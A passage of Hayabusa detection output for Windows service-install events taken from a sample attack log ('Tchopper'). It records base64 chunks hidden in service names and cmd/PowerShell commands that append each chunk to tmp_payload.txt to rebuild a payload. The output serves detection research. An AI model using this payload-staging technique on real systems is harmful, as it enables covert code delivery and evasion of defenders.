1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:08.797 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:10.344 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:10.344 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:10.344 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:11.817 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:11.817 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:11.817 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:13.280 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:13.280 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:13.280 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:14.730 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:14.730 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:14.730 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:16.183 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:16.183 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:16.183 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:17.653 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:17.653 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:17.653 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:19.099 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:19.099 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:19.099 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:20.573 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:20.573 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:20.573 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:22.040 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:22.040 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:22.040 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:23.478 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:23.478 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:23.478 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:24.954 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:24.954 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:24.954 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:26.398 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:26.398 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:26.398 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:27.853 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 